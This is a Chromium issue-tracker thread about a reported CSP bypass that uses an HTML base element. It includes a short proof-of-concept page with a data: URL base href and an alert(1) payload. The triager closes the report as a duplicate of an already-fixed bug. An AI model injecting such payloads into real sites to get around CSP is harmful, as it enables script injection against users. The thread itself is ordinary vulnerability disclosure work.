Issue metadata
Sign in to add a comment
|
Security: Content Security Policy (CSP) Bypass with using base element
Reported by
chromium...@gmail.com,
Aug 2 2017
|
||||||||||||||||||||||
Issue descriptionVERSION Chrome Version: 60.0.3112.72 stable Operating System: iOS, Android PoC: https://jsbin.com/yadunevade <html> <head> <body> <base href=data:/,-alert(1)/> <script src="./lib/jquery.js" nonce=random-secret></script> </body> </html> You will see a alert box.
,
Aug 2 2017
The Proof-of-Concept seems to be identical to crbug.com/679318 , the fix for which landed in 58.0.3008.0. I was not able to reproduce any problem here on either Windows or Android. On iOS, this is out of Chrome's hands as the CSP implementation is provided by WebKit. Can you please add screenshots of the repro process on Android?
,
Aug 2 2017
Oops! I forgot to try this on the latest version of stable on Android. Sorry.
,
Aug 2 2017
Thank you for providing more feedback. Adding requester "elawrence@chromium.org" to the cc list and removing "Needs-Feedback" label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 2 2017
Thanks for letting me know. If you see something surprising, please do reopen.
,
Nov 9 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by chromium...@gmail.com
, Aug 2 2017